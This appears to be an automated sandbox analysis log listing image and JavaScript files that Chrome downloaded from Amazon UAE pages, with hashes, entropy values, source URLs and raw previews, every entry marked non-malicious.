                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UFG_AE/Prime/Prime_quality-guaranteed_400x300_en_AE.png
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR.......,.......V....5PLTE............$R......................................................>Qk........3Ig....%S.*Vcl{.(T.........Yew.......-W...0Y.:_...$>a..y}....FWo....7]sx.....3Zfn|.........ou.9Mi.........(Ab........akzVcv]hy+Dd...kr~...IYp...-EeATm........M]r....../Ge........R`t............................%...fIDATx...{[.V..q..!c[.N;..B..E.R..r..E..*..]..GX...`.Jb../..M4?.sr..%"""""""""""""""""""""""""""""""""".......^.......+............p....p....p....p....pf..z..!..L=.?.7..y....-..T..?...p....p....p....p....p....p....p....p....p....p..7#....Q......'..o..^.\A.~_.....V}Z..i./p.q....p....p....p....p....p....p....y..p.......3...8.T29ar.....8....8....8....8...2...3"...8....8....8....8....8....8....8....8....8....8.......8....8....8....8....8.....'.+...g..b91...<.....$..H......r`....~lG..X......9.. ..9.k....-....l.L...D>..;s.;..p..iJ.L..*.\3.6.e<..Qu.~Z......\a...*...g.*..hE.!).S..e.e.s]e?a..*.......t>..l.T.W.....?..x;...G..<
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 150x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):8622
                                                                                                                                                                                                                                                                Entropy (8bit):7.958997056383799
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Qol3udd1xI6otDQ089iuDYtHKvNJFmoZ0Scibp:7356YQL0tHKvNKoZ7hbp
                                                                                                                                                                                                                                                                MD5:CBDEBB66CD4C9EEEE9003F8B1CC4C899
                                                                                                                                                                                                                                                                SHA1:BF0D79C14AAA390D3B869C4D66ECB8E339FFAAAD
                                                                                                                                                                                                                                                                SHA-256:1AFBE8A6AD5E1C40F9C028DC32FF0E5255C228B434AC572BF08F8BEFCCB528DE
                                                                                                                                                                                                                                                                SHA-512:7DE3DBA0EA80BC068ABCD4D4C32B653B6C8C84A048D2C518E0D73C256B6F3D79ACA177B2774E08184AC969C0EEAACA2757C417CDEB1B1EC8EB092ABF22BEA9E2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.1.Q."Aq..#2BRa....4brt..$3.5.Ccs...d.....................................................!1.Qa."2Aq4.......#...Br..............?.Ju.7........JF....;X..:....U....7M.O.......n.4>../.......I..j.=.w..P..U..bXa.,.......60.q...)...w.tQE;...I%.$}.......8.q[..M.,c..q..S......../...K.(.`......DX$.v[.......W.,{..9P....[X..BY."J.@...vs..},/....#........$.$.....uq...g_.,...-/..A....W..'vG?wc.j..!.(..B.(.../N~..........-.....xs...H|V.....].F..K......W.Y.....em...\$d........"..@Q.....^.Z....w.7#.}...ZTV.......e~Q.E.1......B].1.<x..eC.q....v}..o.;**..........ZS.Y....n....:!.......E..8.............S..zF..*..n....>R.C....^..~....[...Pq('.q."O._...QM.aE.Q.QE.B.QE...QD!E.Q.V.K....B.......5.....\r.i~7........f.u.......q.b..u2O...H..g.l.+!E
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4573
                                                                                                                                                                                                                                                                Entropy (8bit):7.796591990824318
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TVjP8rjbJHEVt2WmXtHjqLr/nWMhJqIMSTQKPftLmZ:aLZIXmXFkr/jpm
                                                                                                                                                                                                                                                                MD5:202BCB678C2D1C5FDB579804E8B53D85
                                                                                                                                                                                                                                                                SHA1:3BC616DC7C12F250206EF7E68CC21E1CF540AB1C
                                                                                                                                                                                                                                                                SHA-256:0FD972D9E5078D6CA552E7355AA957C953B9ACCE1D58E3AAF119B7DF6A3ED4A8
                                                                                                                                                                                                                                                                SHA-512:AA7C16F24DC8EF1AEEEB6E9E2DC3F64A263B52DE07E69AC27119B6DD434B8E6F3EF34F31E9C9F1350530E6B0A8182D78F299AEEC4CF849A34F7E2AFAA6710691
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/31Lxe89wp8L._SR240,220_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........6...................................................................X................]..B...;....=;y.=:y.=:y..z|..z.....'...........3.Vw?W.z..N..".....R...y..N..Q...(Y.W...}m.....9....,.c..s..hh=.a..$.b.l...}.&?g7g1.BV.&'..O...y..[q7...`...p.<`...t.q..J6.4...P.)V...Z......G......k1i..9~..~e.c,b0.H..qi>..........#.c..P[...k.XCQ....e...^..|....-..Z.=..8...2:.....O...W..x......l.i.{~m.....a..+CK.a..M_t..m.o[.P.sV.h[I.8..yjz..l.ik.>..#/(....%.t.......Z...#.5.......[...0......n.-../F&'Qm]=.7.|.......1.F-*Y.>..s.C.....g.U-Lr.Qj....7..K|.V....p.^K].pg...8.......:.k.kh...pHs^.n......qqR..l.....]Y......9.B.9..b....:F8........l&.Ae=.5..k..O...jno..;=........Kc.}...f..Zz..lk....#.-.8...h.....U.Z2....YEK....).R..Xc..E...i.....s..F....Jq..........P.....(...4.O.@...............................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):5027
                                                                                                                                                                                                                                                                Entropy (8bit):7.921807659808277
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:Dy8Iif78/3YZLUmJcZbvDn30epn23gWWt1yPdQZ3yJsnm1JLEY2XpN:9Df7UyLncvWq1yPdXD1JLE/N
                                                                                                                                                                                                                                                                MD5:8EA64965A0B7E618AC0F488E3EA2A8A8
                                                                                                                                                                                                                                                                SHA1:7F21527A941C0A73F0DEC491FF66E475A77E10D9
                                                                                                                                                                                                                                                                SHA-256:B578B3D723161A6995AA33C1DD6AAD06676A1E1974E27F76446B29059490A493
                                                                                                                                                                                                                                                                SHA-512:13FB5349A02708D7B1E2ED77959F21B3534CFD0824CA446FA3B8C7129B4950DB3175DF52A23F0F9F45F69FCD0712038F585440BAC3AE97287014B7D2FFCB2BB5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1740513_3911851_186x116_1X_en_AE._SY116_CB566464918_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................&..."..$.&.&%%'*+&.*:...........$...%...,%+.%'%%.0%+$%.&%."".....%.''&..'$.4...%$*".'.......t...."..............................................................!1A.."aQq...#2...Br..RSb...C....................................................!1"2A.#.3Q............?..lAR3V..l.-.v...i........A..c..D.Q.m],@..x...P.~.T.f..$[^..s...m.....B.<..g.!.G..m..F..y]..hf..5..o.,...*,.W.8.J.u......ST..+nRVx.5n&[q..;..B|..la.,s\.^.@.......$;...?.JRh.\J.PL].g.......F8&.2..0..{....d...pT.xnI..h..~oX4'?..}.S.....`F...9....K.F.s....Q.......a..I.].t.X.<).....x,.V....C}),z.2...J....n.......:....`...E9I..0U.i....8...da.....J}...=.#....u...i5...*^...".)..Z/.(y..oWa5.......$qV}..J#..XkQ..5....4#..Ubc&j9\0.....".;.7.v/4....%..V_..&..T.,.........r....iZ.r.`...-SQ........8..\@{.&...s.Cl...*v..5.HA.i..C.ju.7.w.W.Q.v?*..B.3A-.k..MD..r..a...73I.?"(......X...Q.e..M.d.b.gS.....b_..rx"...<.hT.....3"'.3|..........d.Z..i
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):12602
                                                                                                                                                                                                                                                                Entropy (8bit):7.91213063092888
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:YMYnJzuegeT+jgXEuddddddddd13MTj2mw0rGQg2BLUPeZp6F03raqm7sbe+6W6q:q9T+cUY3MTaZIg21xiqm4S+6W66b
                                                                                                                                                                                                                                                                MD5:8469D7A400DFEC81B5D4B9EA31CD92DD
                                                                                                                                                                                                                                                                SHA1:11812426128F185C6F0392ECB2FB61AA550005DF
                                                                                                                                                                                                                                                                SHA-256:862666125B9D2A84160C863A1E2F31BBEDA84A39EF7A252AA675729A35301055
                                                                                                                                                                                                                                                                SHA-512:DB62D128F0A4086A3E63243B1B7CA0F48DF8600954C5EDE667DF2C2F4C9BF0BB623B7D1F92F32E293C46E689B6CB7E6539E3EEE7E4C71B26EBBC26F1FBD2FCF5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259756_400x400_2X._CB617696541_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................................................................................................................."..........2.........................................................................}.....3.C<.e...%....................6.e.b|.__/.o.$....W#...V...:.J................q.pS........;.k.]....%.......8..v.#.D<.......k?%.Yz`......;x...~so;`......k.....a......5..tMXg...{f&..}...y.p....'.M................$...0y.$ewg>Z3~Wg................!.ro....v.=...!..................5E.*.G...).*q...[...Z......r2.j........D...+.s...Cg8..7..o........?..w...?.#.?.....[.....s....O=.-z.\.h.Y 6n..3...........*.]rZ#'@(.......+.#......t.X..|Q....>.3........%#..l...r.X.u2.......[..4.....|............M.q..7m'-.1.L..........,Ti.P......r4.i......}%.Xz.....O}....C....C..P....c..c^....G4....N>.dF9.}W3.zVq..rE.~'.!g.m.a...........).)...] ....i..:.}.7....).n...=.b=.I..1.6d...e.Z.-./..T....%%!.6.P.0.{.1.@........x9
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2170
                                                                                                                                                                                                                                                                Entropy (8bit):7.570999281272398
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6Hr9/cwFxHT37u+tP2Ag9EfJQD8eIxIbr3PhpVuDIenXzC:TvrVcmxHnq9E4uGX3Z3Whne
                                                                                                                                                                                                                                                                MD5:E2E145F68FF332EFB98DD08440D07874
                                                                                                                                                                                                                                                                SHA1:CE07808F51600F704596840F4B8A6BBCBC4D1907
                                                                                                                                                                                                                                                                SHA-256:C56C07FBED866CD59D8C491637A2F4D9AD647916D2ACEA09D1DEF5613AF3E5F1
                                                                                                                                                                                                                                                                SHA-512:F83B1DE3CC7B99319C943E47B7D3523D734A6314A34798CF101DEB1D89C8B0EDF00168E4EFA48DD887CED7A5717D24749E9026E90B4824E68702B9C0C3BA17D5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!1Aq.#2Qa..."Rrt....3Cc...BDbds..................................................!.12...3q.Aa............?.....X....................................s}.u.....b...kH..W..m....+....a........Dc[.d.jF.....x......RN=...d....iU..:..U..j6|k......-...F.3q.K.<^.`.....Am..99...n+.s...e.."....J0......u^.k]".........Q.5..J.A6...d._L^b..W.N.>..Y...'W.[...-'..~.......y..[.k.&65......%...M..%*...j[>q.z...2.5P..f5...f4'].;.(.U{m7d.p...8..$.9...Ux......]...=...............8G..g...I....fh...=S.)<..}k.>n....uK.\.../..5...-.a)..W.=.....-...-..Vlp...-En...IF;>q.....Q3..;..D.....,|.yK8....*..-...6.Ou/.....{..oY<L....Vj.zm8;a....k..od.v.G..,|*eU.K.S..^..E..g.,}K..\.[..r.z./m....Mu?_q.R.C.W..L.........?. ...._....tg.r......uf...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 221x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):11539
                                                                                                                                                                                                                                                                Entropy (8bit):7.962398144211074
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Udb1Nt4IlTHKwsOlGjXMuDmZpaZrO98XIou9CMK6HRTKjVRh+ZmEuu9i33:UdZTpTHJFWX5UpGK8IBCd0ReL7EX9q3
                                                                                                                                                                                                                                                                MD5:C70968837539F436DA38FA83A200B2C3
                                                                                                                                                                                                                                                                SHA1:25BD830D9335E11E2237C09A1D922624896B9928
                                                                                                                                                                                                                                                                SHA-256:B931367C5B20558CF720AEAF7236B710B1BDA28FB986F353FBDCA9442639B82A
                                                                                                                                                                                                                                                                SHA-512:5F9D0C61AB34069DBFED43BC049D0B8CF85EC818417F9A560DD22777EE7865C43AB07F5474B2BA41C1CDBDB60D237F9AB075B26AC2A7AC3B6FDA16742992731B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/914aX7nCqFL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1..A.."Qa24BDSTqs.......#C..Rb.$3..................................................!.1..AQ."aq.2..........#BCRbr...............?..=:.....1G.`....}.....}.m.Q..J"y...S..y...S..R..o......o.......'...E?.....E?..(.....O.)....O.)Z.).<.wI#.(..D.]....<...;.@+..D[#am.I..<..qN.=......@......ZWp........$.$.v.A....g4.XGL.-...9.Qu".y.7.0.uX....z.)^xRH.qY.L...l....H .......z..N..(2....l.......$.588w...#Z.....gg.Z+{H.A..X].H..K.V..... ).0..k...-..\JL..;.M.H.v1.| XY#.h....chp.g.a.6W\+...w1.Z).J...>6.n.6y....}.......5.4..!.}..;H.H.....HC#...~...n.sR.Wy.w......,..qt...[U0...C..`FT.....'......."..Uy.....f.......H`.9g.M.3:.....v...SMB..7..B.....{S....+.0wM.fR.]N..S....O.)....O.)J"y...S..y...S..R..o......o.......'...E?.....E?..(....XS....|.3l...~q.K..V
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (665)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):276653
                                                                                                                                                                                                                                                                Entropy (8bit):5.353303330296469
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:ZYIIAmk1Xaq/LTCz6PHRL5gYI5B6USVMbN/MYSidNII:ZjPxLWYgbNUYSidNII
                                                                                                                                                                                                                                                                MD5:93995E60EBDBA822321A0B8F0F634C39
                                                                                                                                                                                                                                                                SHA1:FB5BD2ED20160C0319F07EE2C4EBB5C4A9C69292
                                                                                                                                                                                                                                                                SHA-256:DF95985F6015F7836098CA75EE3E14E137999D59D37939DB70A1D1FDDB91BF10
                                                                                                                                                                                                                                                                SHA-512:1D85AC5DF9D8790809821C878DA8B2F2D14CFAA49609CE01F898B9F40A33DBA84E3DB25B62787C51A6C46C1F5A97094695592330FEB79F660225FE0CC836A33C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(a){var c=window.AmazonUIPageJS||window.P,d=c._namespace||c.attributeErrors,b=d?d("AmazonUIBaseJS@analytics","AmazonUI"):c;b.guardFatal?b.guardFatal(a)(b,window):b.execute(function(){a(b,window)})})(function(a,c,d){"use strict";a.register("a-analytics",function(){function b(b,f){var a=c&&c.ue&&c.ue.count;if(a&&b){var e="aui:"+b;1<arguments.length&&a(e,f);return a(e)}}var a=c&&c.ue&&c.ue.tag;return{increment:function(a,f){if(a){var c=b(a)||0;b(a,c+(f||1))}},count:b,logError:function(a,f,b){c.ueLogError&&.c.ueLogError({message:a},{logLevel:f,attribution:b})},tag:function(b){a&&b&&a("aui:"+b)}}});a.when("a-analytics").register("prv:a-cache-analytics",function(a){function b(a){var b=a.name.indexOf("AUIClients/AmazonUI");a=a.name[b+19];a=a===d||"\x26"===a||"#"===a;return-1!==b&&a}function e(b){a.tag(("script"===b.initiatorType?"js":"link"===b.initiatorType?"css":"unknown")+":"+(b.transferSize===d||b.decodedBodySize===d?"unknown":0===b.transferSize&&0<b.decodedBodySize?"cache":0<b.t
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 168x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4289
                                                                                                                                                                                                                                                                Entropy (8bit):7.914187236916662
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TCpdNTAkU2Elqvm2sIXtdK4H6z2d1VNnS2:updNT5v2NtMHKKSK1Vn
                                                                                                                                                                                                                                                                MD5:86EBE003E84E5BABA6D67CBD76C51BE0
                                                                                                                                                                                                                                                                SHA1:FF180F77A4D7A36D4B526A71E696417663BE3F91
                                                                                                                                                                                                                                                                SHA-256:9CF988A6E3F309E9518702797163E3E4361882F0E8A61B91DD6D9B502147DB3B
                                                                                                                                                                                                                                                                SHA-512:9DF8CFE1B1894A3C4C228B2D9367BE3D25091437EFFEECBE5C6751EB97A08967612AF1411C4875DA003AE788F4A2EDA18FE23088520CBD8B209272A26DBDAC10
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/81Oo9KYmy3L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................!....."1Au..35QSUaqs......$BCbr.....#%24d.........6Tt...&Re...........................................A..!............?..S...\..h$.l..$...O...7..o.6...r...0......}<f.z...>>.../..G~..O$.H..H.n........v.W+...BM.....?.1..{...wp..W...d..*X<i..........."..o.%.e....8....w_.s.@...m..lu...+..vH..aKM.HS..1A.IM.J...V..$.>....>t.C.|...?7.....}..?.T.<..q.$v......](>..4;..9E.#.r...lx...z..^.|.......w...vB...-/.7.|...+azj^>9...7..54=..M.s8w.=......'8.....]...Fv...6F.xw5/~.d.d.S.......94=.+dw..q...@.....@<.w.+....A.r........%'..@...O.M.*A.w/<.d.X..z_.{E?l.W.Sp..>.hz,VUq;...QSQ.\{.C.^m.$..j.Sx......X.......4S..|...w{\..5k.t....m..ZQ.....#~0:.:."..1..G'.[..7.m..J.....?${...;.$N.c..C.Gp.....;e.Z....m<.....J.._..lE.....f.%.~..<._.=|.H......?.J.9
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (570)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):61068
                                                                                                                                                                                                                                                                Entropy (8bit):5.273369773505074
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:Alc/7w2HtMrXwhCkOLaZwVXCIIo3s7mtgEoW9GVFChA33:AqFarXxC3oTgbWZA
                                                                                                                                                                                                                                                                MD5:55CAB1E940F4E8F9CA3B895895CB57E2
                                                                                                                                                                                                                                                                SHA1:891873B8214ABA3F7FB8A306D3D586807AB9006B
                                                                                                                                                                                                                                                                SHA-256:E30998F16CB81E026CE4A6ABD872A0939BC89376785B7415AA115167087A3521
                                                                                                                                                                                                                                                                SHA-512:3BEFFD01CC8AED079E8AE1A7DDEA09FCC776E408F960BD7CF582D740396CEB919467133F57068DF0B70E0CCD2A06CB1440CBE21516D44701FCBC9129E0E6157B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/51GRfnCRJBL.js?AUIClients/QuantitySelectorAssets&X7ecmQ3Q
                                                                                                                                                                                                                                                                Preview:(function(q){var x=window.AmazonUIPageJS||window.P,F=x._namespace||x.attributeErrors,A=F?F("QuantitySelectorAssets",""):x;A.guardFatal?A.guardFatal(q)(A,window):A.execute(function(){q(A,window)})})(function(q,x,F){function A(n){var f=!1;q.now(n).execute("qsAssetDuplicationGuard",function(a){f=!!a});return f}function L(n,f){if(!A(n))try{q.register(n,f)}catch(a){if(!a.message.includes("reregistered by QuantitySelectorAssets"))throw a;}}function Da(){var n=arguments;return{register:function(f,a){if(!A(f))try{q.when.apply(q,.n).register(f,a)}catch(c){if(!c.message.includes("reregistered by QuantitySelectorAssets"))throw c;}},execute:function(f,a){q.when.apply(q,n).execute(f,a)}}}L("QSAssetDuplicationGuard",function(){return{register:L,when:Da}});"use strict";q.when("QSAssetDuplicationGuard").execute("qsAUIDeps-main-duplication-guard",function(n){n.when("A","QuantitySelectorConstants","a-util").execute("qsAUIDeps-main",function(f,a,c){function h(){w&&w.enableCheckoutCompatibility&&g()}funct
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):13638
                                                                                                                                                                                                                                                                Entropy (8bit):7.892050748414596
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Gs/gK8khyeMEg+SThqUe+xTqExzq/I7KhG0GNyrsNAgbjKWD8AeQ2Ka70n9LA5F5:RM/1U+5pzq/zxN+tS3Q298ub
                                                                                                                                                                                                                                                                MD5:BCDEF36259383D92C18F1E279E574672
                                                                                                                                                                                                                                                                SHA1:C1FBDD73BA0B7A36A5487D371EE445C12AB34974
                                                                                                                                                                                                                                                                SHA-256:5151B05089677C3ABD63A1085734599B7DF43AF87061C8E1A49C56FEFEACDACF
                                                                                                                                                                                                                                                                SHA-512:112F9C4645860FB3B265801782AE7EE0A1ACDFBE74A3306FC4FA29260CC9C851DA3AD4837C11ACD853B0ED936747B4C461498B7A459C3CA3D5A0A1C1121E9F4B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/412CLCbp2pL._SR480,440_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................,..................................................(UAU.T.PT.5.ej...............x..J.............>9..{T..S..sh.Q.....}`>O}`>O}`>N}bc.......}a.8.E.g...J}S.:..O.....>.........tyD~...^y.^.^..jW..@...........q..?8$....(R.g.|..u..N.4[.;.k.ku.kD....u......<T.......?... .........|..x.n...W...oz.,6..r+.>..~h...5.q....}vL.d....I...u.{...K...q.3..b$e.................>m..?.O..+..&....&....7.d.r.....;<.^k..X3r3%......q.vL./....3.}~i......Rw{T.j...jY..{.+..............}..)..j,{V.,.in.|..|....!].....].6..M.~n..m._...9..<...jD^/S..a.....'...O8..K...O....{O0...........=..vJ....y...L../.O^'.0..N\.....7f...p..$..S7/.%.}z..1..<..Y....O..v...%.U..z...t.s...`=.................\.>..S/1._..3.3..c?#i...J.tx..x[.y%.+....q..I.......2`....e
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (523)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):9763
                                                                                                                                                                                                                                                                Entropy (8bit):5.5576256209320105
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:6U7KggJdFc65eODBRWPWVJfZZ4CD7N1bNa+AqDWzEF7jTwT8U:6U7Knz5eiBRhVjvriYlU
                                                                                                                                                                                                                                                                MD5:6EED3151A81957F00C3AA5AD97F78CAB
                                                                                                                                                                                                                                                                SHA1:6C0E9AD0ACB70ECB40B78B05CC7273D5FF882C97
                                                                                                                                                                                                                                                                SHA-256:8A1CA9608771693D06B0109E1E442D495DA603F32182A6527F9F1026C84780E9
                                                                                                                                                                                                                                                                SHA-512:92462B00575FE2B761D3159F7ACE5D5FF4C56B71228925B187FEF8E164D5F8C4354215AC2BEF26F0532AA162257AEF285C8EEB902F4EFF187FD9DA8FCCBBE98A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/31bJewCvY-L.js
                                                                                                                                                                                                                                                                Preview:(function(c,m){function y(a){if(a)return a.replace(/^\s+|\s+$/g,"")}function x(a,g){if(!a)return{};var b="INFO"===g.logLevel;a.m&&a.m.message&&(a=a.m);var f=g.m||g.message||"";f=a.m&&a.m.message?f+a.m.message:a.m&&a.m.target&&a.m.target.tagName?f+("Error handler invoked by "+a.m.target.tagName+" tag"):a.m?f+a.m:a.message?f+a.message:f+"Unknown error";f={m:f,name:a.name,type:a.type,csm:N+" "+(a.fromOnError?"onerror":"ueLogError")};var h,l=0;f.logLevel=g.logLevel||A;g.adb&&(f.adb=g.adb);if(h=g.attribution)f.attribution=.""+h;if(!b){f.pageURL=g.pageURL||""+(window.location?window.location.href:"")||"missing";f.f=a.f||a.sourceURL||a.fileName||a.filename||a.m&&a.m.target&&a.m.target.src;f.l=a.l||a.line||a.lineno||a.lineNumber;f.c=a.c?""+a.c:a.c;f.s=[];f.t=c.ue.d();if((b=a.stack||(a.err?a.err.stack:""))&&b.split)for(f.csm+=" stack",h=b.split("\n");l<h.length&&f.s.length<F;)(b=h[l++])&&f.s.push(y(b));else{f.csm+=" callee";var m=z(a.args||arguments,"callee");for(h=l=0;m&&l<F;){var v=G;m.skipTr
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (665)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):276653
                                                                                                                                                                                                                                                                Entropy (8bit):5.353303330296469
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:ZYIIAmk1Xaq/LTCz6PHRL5gYI5B6USVMbN/MYSidNII:ZjPxLWYgbNUYSidNII
                                                                                                                                                                                                                                                                MD5:93995E60EBDBA822321A0B8F0F634C39
                                                                                                                                                                                                                                                                SHA1:FB5BD2ED20160C0319F07EE2C4EBB5C4A9C69292
                                                                                                                                                                                                                                                                SHA-256:DF95985F6015F7836098CA75EE3E14E137999D59D37939DB70A1D1FDDB91BF10
                                                                                                                                                                                                                                                                SHA-512:1D85AC5DF9D8790809821C878DA8B2F2D14CFAA49609CE01F898B9F40A33DBA84E3DB25B62787C51A6C46C1F5A97094695592330FEB79F660225FE0CC836A33C
                                                                                                                                                                                                                                                                Malicious:false
